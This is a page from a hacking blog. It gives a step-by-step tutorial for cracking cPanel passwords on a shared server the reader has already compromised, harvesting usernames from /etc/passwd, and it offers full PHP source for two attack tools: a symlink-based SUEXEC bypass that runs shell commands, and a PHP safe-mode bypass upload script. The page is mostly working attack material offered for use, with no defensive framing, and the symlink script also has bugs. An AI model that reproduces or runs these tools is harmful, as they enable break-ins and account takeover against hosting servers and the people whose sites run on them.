Labels

Popular Posts

Powered by Blogger.

Blogroll

Hacking Cracking Tricks

Recent Comments

BlogRoll

http://www.prcheckingtool.com

Recent Posts

Bookmark  and Share Technology & Science Blogs - BlogCatalog Blog Directory Submit your website to 20 Search Engines - FREE with ineedhits! http://www.prcheckingtool.com Text Back Links Exchange PageHeat Website Value LocalSubmit.com : search engine submissions and website promotion with free advice Internet Blogs Hacking Cracking Tricks

Showing posts with label Shell. Show all posts

Cpanel Hacking/Cracking Tutorial [step by step]

Today we will Learn CPANEL cracking or Hacking  i.e gaining password for port no 2082 on website first of all we need a cpanel cracking shell on the server because we are going to crack those websites cpanels which are hosted on the shelled server. 

so lets start i am using cpanel.php [download it here]shell for cracking :) we need two things in cracking first one is usernames of the websites that are hosted on the server second is a good password dictonery[Get Passwords List Here]

 
so in first step :-
 grab the usernames of the websites using command ls /var/mail
 or use the "Grab the usernames from /etc/passwd" option in the shell
press the go button
  we have done from our side
  lets wait and watch ,if we have supplied good passwords then shell will show a message 
   " [~]# cracking success with username "xyz" with password "xyz"   "
  otherwise it will show 
   "[~] Please put some good passwords to crack username "xyz" :( "


  so chances of success depends on password list that we are using in cracking process 

SUEXE Bypasser Via Symlink (V 1.01) [Priv8]


<html> 
<body bgcolor="0000000"> 
<title>symlink</title> 
<center><b><h2><font color="red"> SUEXE Bypasser Via Symlink (V 1.01)</font></br></center></b></h2> 
<center><b><h4><font color="red">WITH THIS SCRIPT U CAN USE SYMLINK IN 2 METHODs</font></br></center></b></h4> 
<center><b><h4><font color="white">Dest = Destenation Of Path or file That u Want to Symlink It</font></br></center></b></h4> 
<center><b><h4><font color="white">name : File Name That u Want To create in ([path]/smlnk)</font></br></center></b></h4> 
<center><b><h4><font color="white">Upload This Script In Full SUEXE or FullPerm Directory</font></br></center></b></h4> 
<center><b><h4><font color="white">Written For *NIX Platforms</font></br></center></b></h4> 
</html> 

<?php 
//CODED BY IRAN 
//form defining 
print "<form method=post>"; 
print "<center><font color=green>"; 
print "<b>dest :</b><input size=50 name='destenation' value=''>"; 
print "<br>"; 
print "<b>name :</b><input size=50 name='name' value=''>"; 
print "<br>"; 
print "<input type=submit name=_act value='Create!'>"; 
print "</center></font>"; 
$dest = $_POST['destenation']; 
$destname = $_POST['name']; 
?> 

<?php 
//defining variables 
$dir = dirname($_SERVER[SCRIPT_FILENAME])."/smlnk"; 
$acc = $dir."/.htaceess"; 
$cmd = "ln -s".chr(32).$dest.chr(32).$sym; 
$sym = $dir."/".$destname; 
$htaccess =  
"Options +FollowSymLinks".chr(009). 
"DirectoryIndex seees.html".chr(009). 
"RemoveHandler .php".chr(009). 
"AddType application/octet-stream .php"; 

if (!file_exists($dir)) { 
mkdir ($dir); 
}  
sleep(1); 
if (!file_exists($acc)) { 
$handle = fopen( "$acc" , 'a+' ); 
fputs( $handle ,  "$htaccess" ); 
}  
?> 

<?php 
//check method 
if (function_exists (exec) OR function_exists (shell_exec) OR function_exists (system) OR function_exists (passthru)) { 
$check = 1; 
}else{ 
$check = 0; 
} 
if(function_exists (symlink)) { 
$checks = 1; 
}else{ 
$checks = 0; 
} 
?> 

<?php 
//define command function 
$resault = '';  
function command($cmde) { 
    if (!empty($cmde))  
 {  
if (function_exists('exec')) { $resault = @exec($cmde); }  
elseif (function_exists('shell_exec')) { $resault = @shell_exec($cmde); }  
elseif (function_exists('system')) { $resault = @system($cmde); }  
elseif (function_exists('passthru')) { $resault = @passthru($cmde); }  
 } 
return $resault; 
} 
?> 

<?php 
//execution 
if ($check ==1 && $checks ==1){ command ($cmd); } 
elseif ($check ==1 && $checks ==0){ command ($cmd); } 
elseif ($check ==0 && $checks ==1) { symlink ($dest,$sym); } 
elseif ($check ==0 && $checks ==0)  
{  
print ("<center><font color=green><h1>script doesnt work for this server</font></h1></center>");  
} 
?> 
<?php 
//is safe mod on ? start 
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")  
{  
$safe="<font color=red>ON</font>"; 
}  
else {$safe="<font color=green>OFF</font>";} 
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>"; 
//open safe mod end-- 
?>  
<?php 
//disable function start 
echo "<font color=whitepurple>Disable functions :</font> <b>"; 
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} 
//disable function end-- 
?>

PHP < 5.2.5 Safe mode Bypass


<?php 
########################## WwW.BugReport.ir ########################################### 
# 
#      AmnPardaz Security Research & Penetration Testing Group 
# 
# Title: PHP < 5.2.5 Safe mode Bypass 
# Vendor: http://www.php.net/ 
##################################################  ################################ 
?> 

<html dir="ltr"> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"> 
<title>SAFE MODE BYPASS</title> 
<style type="text/css" media="screen"> 
body { 
    font-size: 10px; 
    font-family: verdana; 
} 
INPUT { 
    BORDER-TOP-WIDTH: 1px; FONT-WEIGHT: bold; BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 10px; BORDER-LEFT-COLOR: #D50428; BACKGROUND: #590009; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #D50428; COLOR: #00ff00; BORDER-TOP-COLOR: #D50428; FONT-FAMILY: verdana; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #D50428 
} 
</style> 
</head> 
<body dir="ltr" alink="#00ff00"  bgcolor="#000000" link="#00c000" text="#008000" vlink="#00c000"> 
<form method="POST" enctype="multipart/form-data" action="?"> 
Enter The <A href='?info=1' > Target Path </A>:<BR><BR> 
<input type="text" name="target" value="<?php echo $_SERVER['DOCUMENT_ROOT']; ?>" size="50"><BR>*Target must be writeable!<BR><BR> 
File Content:<BR><BR> 
<input type="file" name="F1" size="50"><BR><BR> 
<input type="submit" name="Upload" value="Upload"> 
</form> 
<?php 
error_reporting(E_ALL ^ E_NOTICE); 

if(isset($_GET['info']) && $_GET['info'] == 1) 
{ 
    if (function_exists('posix_getpwuid')) 
    { 
        if (isset($_POST['f']) && isset($_POST['l'])) 
        { 
            $f = intval($_POST['f']); 
            $l = intval($_POST['l']); 
            while ($f < $l) 
            { 
                $uid = posix_getpwuid($f); 
                if ($uid) 
                { 
                    $uid["dir"] = "<a href=\"\">".$uid["dir"]."</a>"; 
                    echo join(":",$uid)."<br>"; 
                } 
                $f++; 
            } 
        } else 
        { 
            echo ' 
            <form method="POST" action="?info=1">Uid   
            FROM : <input type="text" name="f" value="1" size="4"> 
            TO : <input type="text" name="l" value="1000" size="4"> 
            <input type="submit" name="Show" value="Show">'; 
        } 
    } else die("Sorry! Posix Functions are disabled in your box, There is no way to obtain users path! You must enter it manually!"); 
    die(); 
} 

if(isset($_POST['Upload']) && isset($_POST['target']) && $_POST['target'] != "") 
{ 
    $MyUid   = getmyuid(); 
    $MyUname = get_current_user(); 
    if (function_exists('posix_geteuid')) 
    { 
        $HttpdUid   = posix_geteuid(); 
        $HttpdInfo  = posix_getpwuid($HttpdUid); 
        $HttpdUname = "(".$HttpdInfo['name'].")"; 
    } else 
    { 
        $NewScript = @fopen('bypass.php','w+'); 
        if (!$NewScript) 
        { 
            die('Make the Current directory Writeable (Chmod 777) and try again'); 
        } else  $HttpdUid = fileowner('bypass.php'); 
    } 

    if ($MyUid != $HttpdUid) 
    { 
        echo "This Script User ($MyUid) and httpd Process User ($HttpdUid) dont match!"; 
        echo " We Will create a copy of this Script with httpd User $HttpdUname 
        in current directory..."."<BR>"; 
        if (!$NewScript) 
        { 
            $NewScript = @fopen('bypass.php','w+'); 
            if (!$NewScript) 
            { 
                die('Make the Current directory Writeable (Chmod 777) and try again'); 
            } 
        } 
        $Temp = fopen(__FILE__ ,'r'); 
        while (!feof($Temp)) 
        { 
            $Buffer = fgets($Temp); 
            fwrite($NewScript,$Buffer); 
        } 
        fclose($Temp); 
        fclose($NewScript); 
        echo "Please Run <A href='bypass.php'> This </A> Script"; 
        die();     
    } 
     
    $TargetPath = trim($_POST['target']); 
    $TargetFile = tempnam($TargetPath,"BP"); 
    if (strstr($TargetFile, $TargetPath) == TRUE) 
    { 
        echo $TargetFile." Successfully created!<BR>"; 
    } else die("$TargetPath doesnt exist or is not writeable! choose another path!"); 

    if (move_uploaded_file($_FILES['F1']['tmp_name'], $TargetFile)) 
    { 
        echo "<BR>$TargetFile is valid, and was successfully uploaded."; 
    } else 
    { 
        die("<BR>$TargetFile Could not upload."); 
    } 
    chmod($TargetFile , 0777); 
} 

?>

- Copyright © .Hacking Cracking Tricks And Tutorials, Paid Scripts, Latest Exploits, 0Day Vulnerability, - Skyblue - Powered by Blogger - Designed by Johanes Djogan -